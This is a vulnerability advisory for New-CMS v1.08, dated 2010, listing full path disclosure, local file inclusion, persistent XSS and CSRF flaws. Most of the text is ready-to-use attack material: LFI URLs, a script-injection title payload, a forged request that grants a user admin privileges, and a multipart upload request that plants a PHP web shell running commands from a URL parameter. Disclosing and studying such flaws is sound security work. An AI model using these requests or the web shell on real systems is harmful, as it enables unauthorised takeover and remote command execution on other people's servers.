New-CMS v1.08 [ Multiple Vulnerabilities ]

[+] [SOFTWARE] :: New-CMS

[+] [SOFTWARE SITE] :: www.new-cms.org

[+] [VERSION] :: 1.08 (but possible all versions)

[+] [DATE] :: 17 February 2010

[+] [AUTHOR] :: Alberto Fontanella (Fulgur Security)

 

[ 1 ] - [ Full Path Disclosure ]

http://[host]/struttura/ricerca.php http://[host]/pdf.php http://[host]/index.php?lng=it&pg=manager

...etc Output: Fatal error: Call to undefined function ListaFile() in /var/www/struttura/ricerca.php on line 8  

[ 2 ] - [ Local File Inclusion ]

http://[host]/index.php?pg=cmd

You have to put cmd.php in /struttura/

http://[host]/pdf.php?lng=cmd.php

http://[host]/newcms/struttura/manager.php?lng=cmd.php

http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php

...etc You have to put cmd.php.str in /lingue/  

[ 3 ] - [ Persistent XSS ]

Write an Article/News and Put in the Title field: "><script>alert(1)</script>  

[ 4 ] - [ XSRF ]

To give privileges to an User Account:

POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1

Host: [host]

Content-Type: application/x-www-form-urlencoded

Content-Length: 64
 

azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on

 

To upload a PHP Shell:

POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1

Host: [host]

Content-Type: multipart/form-data; boundary=---------------------------213917452311081853951240913053 Content-Length: 424
-----------------------------213917452311081853951240913053

Content-Disposition: form-data; name="radice" Content-Disposition: form-data; name="per"
-----------------------------213917452311081853951240913053 Content-Disposition: form-data; name="file"; filename="cmd9.php" Content-Type: application/x-httpd-php
<?php system($_GET['cmd']); ?>
-----------------------------213917452311081853951240913053--
 

[ EOF ]